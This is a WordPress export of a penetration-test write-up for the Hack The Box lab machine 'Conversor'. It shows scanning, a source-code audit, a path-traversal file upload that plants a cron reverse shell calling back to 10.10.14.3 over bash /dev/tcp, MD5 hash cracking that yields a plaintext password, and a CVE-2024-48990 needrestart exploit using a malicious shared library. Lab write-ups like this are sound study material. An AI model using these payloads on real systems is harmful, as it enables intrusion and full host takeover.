{"id":328,"date":"2025-10-26T21:37:36","date_gmt":"2025-10-26T13:37:36","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=328"},"modified":"2026-01-29T16:19:00","modified_gmt":"2026-01-29T08:19:00","slug":"328","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/10\/26\/328\/","title":{"rendered":"HTB Machine Conversor Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code><strong>10.129.219.14<\/strong><\/code><strong> (not a fixed IP address)<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.118.205 (10.129.118.205) 56(84) bytes of data.\n64 bytes from 10.129.118.205: icmp_seq=1 ttl=63 time=319 ms\n64 bytes from 10.129.118.205: icmp_seq=2 ttl=63 time=428 ms\n64 bytes from 10.129.118.205: icmp_seq=3 ttl=63 time=350 ms\n64 bytes from 10.129.118.205: icmp_seq=4 ttl=63 time=372 ms\n\n--- 10.129.118.205 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3003ms\nrtt min\/avg\/max\/mdev = 319.404\/367.336\/428.195\/39.803 ms<\/code><\/pre>\n<p>Network connectivity between the attack machine and the target is normal.<\/p>\n<h2>Firewall Detection<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Oct 26 07:13:00 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.118.205\nNmap scan report for 10.129.118.205\nHost is up (0.33s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Sun Oct 26 07:13:35 2025 -- 1 IP address (1 host up) scanned in 34.95 
seconds<\/code><\/pre>\n<p>The target appears to have ports <code>22\/tcp<\/code> and <code>80\/tcp<\/code> open.<\/p>\n<h2>Network Port Scan<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Oct 26 07:17:15 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.118.205\nNmap scan report for 10.129.118.205\nHost is up (0.29s latency).\nNot shown: 65533 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)\n|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52\n|_http-title: Did not follow redirect to http:\/\/conversor.htb\/\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nDevice type: general purpose|router\nRunning: Linux 4.X|5.X, MikroTik RouterOS 7.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5 cpe:\/o:mikrotik:routeros:7 cpe:\/o:linux:linux_kernel:5.6.3\nOS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)\nNetwork Distance: 2 hops\nService Info: Host: conversor.htb; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   320.14 ms 10.10.14.1\n2   320.15 ms 10.129.118.205\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Oct 26 07:18:24 2025 -- 1 IP address (1 host up) scanned in 69.16 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Oct 26 07:39:10 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.118.205\nWarning: 10.129.118.205 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.118.205\nHost is up (0.40s latency).\nAll 65535 scanned ports on 10.129.118.205 are in ignored states.\nNot shown: 65284 open|filtered udp ports (no-response), 251 closed udp ports (port-unreach)\n\n# Nmap done at Sun Oct 26 07:43:24 2025 -- 1 IP address (1 host up) scanned in 254.02 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> port detailed scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target runs the <code>Ubuntu Linux<\/code> operating system, exposes the <code>22\/ssh<\/code> and <code>80\/http<\/code> services, and uses the primary domain name <code>conversor.htb<\/code>.<\/p>\n<hr \/>\n<h1>Service Enumeration<\/h1>\n<h2>SSH Service (Port 22)<\/h2>\n<p>Try connecting to the <code>SSH<\/code> service to learn which login methods it accepts:<\/p>\n<pre><code class=\"language-shell\">ssh root@conversor.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761437012097-68fdfa69-5a57-47ce-92c5-29db645507b2.png\" alt=\"\" 
\/><\/p>\n<p>The target's <code>SSH<\/code> service allows both key-based and password login.<\/p>\n<h2>HTTP Service (Port 80)<\/h2>\n<p>Opening the home page <code>http:\/\/conversor.htb\/<\/code> redirects straight to the login page <code>\/login<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761447946210-76d90b6a-c1b8-4eb6-ba1a-363eef360ac0.png\" alt=\"\" \/><\/p>\n<p>The login page has a <code>Register<\/code> link; clicking it leads to the registration page:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761448006241-3d79b276-1d02-4437-8f57-398e7b899c6e.png\" alt=\"\" \/><\/p>\n<p>Nothing else of interest was found on the page. Try a directory scan:<\/p>\n<pre><code class=\"language-shell\">dirsearch -u http:\/\/conversor.htb -x 400,404 -t 70 -e php,py,pyc,js,html,txt,zip,tar.gz,xml,json,pdf,pcap,config -w \/usr\/share\/wordlists\/wfuzz\/general\/megabeast.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761448121060-2c1ff58b-6a7a-44c2-ac24-764025441298.png\" alt=\"\" \/><\/p>\n<p>The site also has an <code>API<\/code> endpoint <code>\/convert<\/code> and an about page <code>\/about<\/code>. First visit <code>http:\/\/conversor.htb\/about<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761448236516-24b2cbf9-0a1b-41ad-bb89-7cdf814250ad.png\" alt=\"\" 
\/><\/p>\n<p>The page lists personal information for three developers and a <code>Download Source Code<\/code> button for the site's source code (which actually points to <code>http:\/\/conversor.htb\/static\/source_code.tar.gz<\/code>). Click it to download the archive:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761457135698-b3641c98-2db9-48d4-9265-9087b8298313.png\" alt=\"\" \/><\/p>\n<p>The site's source code was obtained successfully!<\/p>\n<hr \/>\n<h1>Penetration Testing<\/h1>\n<h2>Auditing the Python Site Source Code<\/h2>\n<p>During service enumeration we downloaded the source code of the target site; now extract the archive and audit it.<\/p>\n<p>Start with the documentation file <code>install.md<\/code>:<\/p>\n<pre><code class=\"language-plain\">To deploy Conversor, we can extract the compressed file:\n\n\"\"\"\ntar -xvf source_code.tar.gz\n\"\"\"\n\nWe install flask:\n\n\"\"\"\npip3 install flask\n\"\"\"\n\nWe can run the app.py file:\n\n\"\"\"\npython3 app.py\n\"\"\"\n\nYou can also run it with Apache using the app.wsgi file.\n\nIf you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your \/etc\/crontab.\n\n\"\"\"\n* * * * * www-data for f in \/var\/www\/conversor.htb\/scripts\/*.py; do python3 \"$f\"; 
done\n\"\"\"<\/code><\/pre>\n<p>According to the document, the site server has a scheduled task that deletes files in a given location every hour, and the end of the document gives an example scheduled-task configuration, which means that every second all <code>Python<\/code> scripts under the <code>\/var\/www\/conversor.htb\/scripts\/<\/code> directory are executed once.<\/p>\n<p>This scheduled-task configuration is suspected to actually exist on the site server. Continue by auditing the main program <code>app.py<\/code>:<\/p>\n<pre><code class=\"language-python\">from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory\nimport os, sqlite3, hashlib, uuid\n\napp = Flask(__name__)\napp.secret_key = 'Changemeplease'\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nDB_PATH = '\/var\/www\/conversor.htb\/instance\/users.db'\nUPLOAD_FOLDER = os.path.join(BASE_DIR, 'uploads')\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\ndef init_db():\n    os.makedirs(os.path.join(BASE_DIR, 'instance'), exist_ok=True)\n    conn = sqlite3.connect(DB_PATH)\n    c = conn.cursor()\n    c.execute('''CREATE TABLE IF NOT EXISTS users (\n        id INTEGER PRIMARY KEY AUTOINCREMENT,\n        username TEXT UNIQUE,\n        password TEXT\n    )''')\n    c.execute('''CREATE TABLE IF NOT EXISTS files (\n        id TEXT PRIMARY KEY,\n        user_id INTEGER,\n        filename TEXT,\n        FOREIGN KEY(user_id) REFERENCES users(id)\n    )''')\n    conn.commit()\n    conn.close()\n\ninit_db()\n\ndef get_db():\n    conn = sqlite3.connect(DB_PATH)\n    conn.row_factory = sqlite3.Row\n    return conn\n\n@app.route('\/')\ndef index():\n    if 'user_id' not in session:\n        return redirect(url_for('login'))\n    conn = get_db()\n    cur = 
conn.cursor()\n    cur.execute(\"SELECT * FROM files WHERE user_id=?\", (session['user_id'],))\n    files = cur.fetchall()\n    conn.close()\n    return render_template('index.html', files=files)\n\n@app.route('\/register', methods=['GET','POST'])\ndef register():\n    if request.method == 'POST':\n        username = request.form['username']\n        password = hashlib.md5(request.form['password'].encode()).hexdigest()\n        conn = get_db()\n        try:\n            conn.execute(\"INSERT INTO users (username,password) VALUES (?,?)\", (username,password))\n            conn.commit()\n            conn.close()\n            return redirect(url_for('login'))\n        except sqlite3.IntegrityError:\n            conn.close()\n            return \"Username already exists\"\n    return render_template('register.html')\n@app.route('\/logout')\ndef logout():\n    session.clear()\n    return redirect(url_for('login'))\n\n@app.route('\/about')\ndef about():\n return render_template('about.html')\n\n@app.route('\/login', methods=['GET','POST'])\ndef login():\n    if request.method == 'POST':\n        username = request.form['username']\n        password = hashlib.md5(request.form['password'].encode()).hexdigest()\n        conn = get_db()\n        cur = conn.cursor()\n        cur.execute(\"SELECT * FROM users WHERE username=? 
AND password=?\", (username,password))\n        user = cur.fetchone()\n        conn.close()\n        if user:\n            session['user_id'] = user['id']\n            session['username'] = username\n            return redirect(url_for('index'))\n        else:\n            return \"Invalid credentials\"\n    return render_template('login.html')\n\n@app.route('\/convert', methods=['POST'])\ndef convert():\n    if 'user_id' not in session:\n        return redirect(url_for('login'))\n    xml_file = request.files['xml_file']\n    xslt_file = request.files['xslt_file']\n    from lxml import etree\n    xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)\n    xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)\n    xml_file.save(xml_path)\n    xslt_file.save(xslt_path)\n    try:\n        parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False)\n        xml_tree = etree.parse(xml_path, parser)\n        xslt_tree = etree.parse(xslt_path)\n        transform = etree.XSLT(xslt_tree)\n        result_tree = transform(xml_tree)\n        result_html = str(result_tree)\n        file_id = str(uuid.uuid4())\n        filename = f\"{file_id}.html\"\n        html_path = os.path.join(UPLOAD_FOLDER, filename)\n        with open(html_path, \"w\") as f:\n            f.write(result_html)\n        conn = get_db()\n        conn.execute(\"INSERT INTO files (id,user_id,filename) VALUES (?,?,?)\", (file_id, session['user_id'], filename))\n        conn.commit()\n        conn.close()\n        return redirect(url_for('index'))\n    except Exception as e:\n        return f\"Error: {e}\"\n\n@app.route('\/view\/&lt;file_id&gt;')\ndef view_file(file_id):\n    if 'user_id' not in session:\n        return redirect(url_for('login'))\n    conn = get_db()\n    cur = conn.cursor()\n    cur.execute(\"SELECT * FROM files WHERE id=? 
AND user_id=?\", (file_id, session['user_id']))\n    file = cur.fetchone()\n    conn.close()\n    if file:\n        return send_from_directory(UPLOAD_FOLDER, file['filename'])\n    return \"File not found\"<\/code><\/pre>\n<p>Reading through the site code shows that the <code>API<\/code> endpoint <code>\/convert<\/code> has an arbitrary file upload vulnerability. In the first <code>9<\/code> lines of the <code>convert()<\/code> method, that is, lines <code>94 - 102<\/code> of the program, the endpoint does not check the uploaded file names for dangerous characters, and before calling the <code>lxml<\/code> library to validate the format of the file contents it already uses <code>os.path.join()<\/code> to join the upload directory variable <code>UPLOAD_FOLDER<\/code> with the original uploaded file name, so an attacker can use the directory traversal sequence <code>..\/<\/code> to upload arbitrary files across directories.<\/p>\n<h2>Exploiting Arbitrary File Upload Together with the Leaked Scheduled Task<\/h2>\n<p>The source code audit showed that the site's <code>XML<\/code> file conversion feature has a serious cross-directory file upload vulnerability, and that the target very likely runs the <code>Python<\/code> script files under <code>\/var\/www\/conversor.htb\/scripts\/<\/code> on a schedule. Now try registering an account and uploading a reverse <code>Shell<\/code> script to exploit this.<\/p>\n<p>First 
visit <code>http:\/\/conversor.htb\/register<\/code>, register a new account, and then log in:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761474526192-26f85f32-9ba5-4b13-a4a1-f3fba75ba2be.png\" alt=\"\" \/><\/p>\n<p>Next, write a malicious <code>Python<\/code> script that adds a reverse <code>Shell<\/code> scheduled task:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport os\nos.system('''echo \"*\/1 * * * * \/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.3\/443 0&gt;&amp;1'\" | crontab''')<\/code><\/pre>\n<p>Then select this script as both the <code>XML<\/code> and the <code>XSLT<\/code> file, turn on the <code>BurpSuite<\/code> proxy, click the <code>Convert<\/code> button to upload, and capture the request:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761474962175-03cdd5cd-4d84-4f63-8f50-4992090ffddc.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761475589574-763b7854-52cc-46ea-9a3f-1b8cc11d1870.png\" alt=\"\" \/><\/p>\n<p>Send the request to <code>Repeater<\/code> and edit the two <code>filename<\/code> parameters so that the actual upload path becomes <code>\/var\/www\/conversor.htb\/scripts\/misaka19008.py<\/code>:<\/p>\n<pre><code class=\"language-plain\">..\/..\/..\/..\/..\/..\/..\/var\/www\/conversor.htb\/scripts\/misaka19008.py<\/code><\/pre>\n<p>Then start a <code>netcat<\/code> listener locally:<\/p>\n<pre><code class=\"language-shell\">rlwrap nc -l -p 443 -s 
10.10.14.3<\/code><\/pre>\n<p>Next, send the request and wait a moment:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761475729298-38b5232f-cba7-4486-86c9-5b89777c53d8.png\" alt=\"\" \/><\/p>\n<p><strong>Reverse shell received successfully!!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Cracking the User Password in SQLite<\/h2>\n<p>Once on the system, the site database is found at <code>\/var\/www\/conversor.htb\/instance\/users.db<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476271611-e99a1115-ea8d-42a4-ae87-31f3269d4aaf.png\" alt=\"\" \/><\/p>\n<p>Download the <code>SQLite<\/code> database to the local machine:<\/p>\n<pre><code class=\"language-shell\">scp -P 22222 \/var\/www\/conversor.htb\/instance\/users.db misaka19008@10.10.14.3:\/home\/misaka19008\/Documents\/pentest_notes\/conversor\/users.db<\/code><\/pre>\n<p>Then open the <code>users<\/code> table of the database:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476389835-750cab92-7e7f-4409-a5f7-87fb1d5a17bf.png\" alt=\"\" \/><\/p>\n<p>The site has a user <code>fismathack<\/code> whose hash is <code>5b5c3ac3a1c897c94caad48e6c71fdec<\/code>, and this name matches an operating system user:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476462749-b9dcc15e-7c1b-422c-add6-dd5523dd9acc.png\" alt=\"\" \/><\/p>\n<p>Crack it with the <code>hashcat<\/code> tool:<\/p>\n<pre><code class=\"language-shell\">hashcat -m 0 -a 0 \"5b5c3ac3a1c897c94caad48e6c71fdec\" \/usr\/share\/wordlists\/rockyou.txt 
--force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476775386-e480ae29-cbbc-4f26-8903-613041589ae3.png\" alt=\"\" \/><\/p>\n<p>The system user's credentials were recovered:<\/p>\n<ul>\n<li>Username: <code>fismathack<\/code><\/li>\n<li>Password: <code>Keepmesafeandwarm<\/code><\/li>\n<\/ul>\n<p>Log in directly over <code>SSH<\/code>:<\/p>\n<pre><code class=\"language-shell\">ssh fismathack@conversor.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476923148-bb635eb0-05e9-4198-98c7-ddeb459497da.png\" alt=\"\" \/><\/p>\n<p><strong>Successfully moved to a higher-privileged user!!<\/strong><\/p>\n<h2>Privilege Escalation by Exploiting a Vulnerable Sudo Program<\/h2>\n<p>After logging in as <code>fismathack<\/code>, use the <code>sudo -l<\/code> command to view the current user's <code>Sudo<\/code> privileges:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761482710067-c0ccedda-b398-44fc-9916-885d1d70093f.png\" alt=\"\" \/><\/p>\n<p>The current user can run <code>\/usr\/sbin\/needrestart<\/code> as <code>root<\/code> without a password. An online search shows that this program checks which services need to be restarted after the system performs an <code>APT<\/code> update. Check the program's version:<\/p>\n<pre><code class=\"language-shell\">needrestart -v<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761482849626-c8926de7-4310-4f0a-842f-82b922525d41.png\" alt=\"\" \/><\/p>\n<p>The version is <code>needrestart 
v3.7<\/code>; searching online for vulnerabilities in this program turns up: <a href=\"https:\/\/xz.aliyun.com\/news\/15879\" target=\"_blank\"  rel=\"nofollow\" >Ubuntu needrestart Privilege Escalation Vulnerability (CVE-2024-48990) Analysis - Xianzhi Community<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761483029724-6500104d-8971-4263-9f9b-6a80d2f022eb.png\" alt=\"\" \/><\/p>\n<p><code>needrestart v3.7<\/code> has a privilege escalation vulnerability, tracked as <code>CVE-2024-48990<\/code>.<\/p>\n<p>Exploit the vulnerability as the article describes. First write the source code of a malicious <code>Linux<\/code> extension library, <code>__init__.c<\/code>:<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;unistd.h&gt;\n\nstatic void a() __attribute__((constructor));\n\nvoid a() {\n setuid(0);\n setgid(0);\n const char *shell = \"cp \/bin\/sh \/tmp\/poc; chmod u+s \/tmp\/poc &amp;\";\n system(shell);\n}<\/code><\/pre>\n<p>Then compile it statically on the attack machine and upload it to the <code>\/home\/fismathack\/importlib\/<\/code> directory (create the directory if it does not exist):<\/p>\n<pre><code class=\"language-shell\">gcc -shared -fPIC -o __init__.so __init__.c\nscp -P 22 __init__.so fismathack@10.129.120.57:\/home\/fismathack\/importlib\/__init__.so<\/code><\/pre>\n<p>Next, on the target, write the <code>Python<\/code> script <code>exp.py<\/code> that triggers the <code>SUID Bash<\/code>:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport os\nimport time\n\nif os.path.exists(\"\/tmp\/poc\"):\n    os.remove('\/tmp\/poc')\nwhile True:\n    if os.path.exists(\"\/tmp\/poc\"):\n  
      print('Got the shell!')\n        os.system('\/tmp\/poc -p')\n        break\n    time.sleep(0.2)<\/code><\/pre>\n<p>And the listener launch script <code>exp.sh<\/code>:<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nset -e\nPYTHONPATH=\"$PWD\" python3 exp.py<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761484545757-1e8b8728-03fd-40ba-976e-21a29c504bdc.png\" alt=\"\" \/><\/p>\n<p>After making <code>exp.sh<\/code> and <code>exp.py<\/code> executable, run <code>exp.sh<\/code>:<\/p>\n<pre><code class=\"language-shell\">.\/exp.sh<\/code><\/pre>\n<p>Finally, open another <code>SSH<\/code> connection and, in the new connection, use <code>needrestart<\/code> to start the service check:<\/p>\n<pre><code class=\"language-shell\">ssh fismathack@conversor.htb\nsudo needrestart<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761484745631-baedd7ae-adce-4651-b862-a45045e59344.png\" alt=\"\" \/><\/p>\n<p>The <code>SUID Bash<\/code> with <code>EUID<\/code> <code>root<\/code> ran successfully! Run the following command to reset the <code>root<\/code> password:<\/p>\n<pre><code class=\"language-shell\">python3 -c \"import os;os.setuid(0);os.setgid(0);os.system('passwd root')\"<\/code><\/pre>\n<p>Then switch to the <code>root<\/code> user in the new connection:<\/p>\n<pre><code class=\"language-shell\">su -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761485034609-7f59706f-c56f-42d4-98ef-e755cb83a9ab.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation successful!!!!<\/strong><\/p>\n<hr \/>\n<h1>This concludes the penetration test of this machine<\/h1>\n<hr 
\/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.129.219.14 (not a fixed IP address) Information Gathering ICMP Check PING 10.129.118.205  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[19,14],"tags":[],"class_list":["post-328","post","type-post","status-publish","format-standard","hentry","category-htb_season_9","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/328","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=328"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions"}],"predecessor-version":[{"id":329,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions\/329"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=328"}],"curies":[{"name":"wp","href":"https:\/\/a
pi.w.org\/{rel}","templated":true}]}}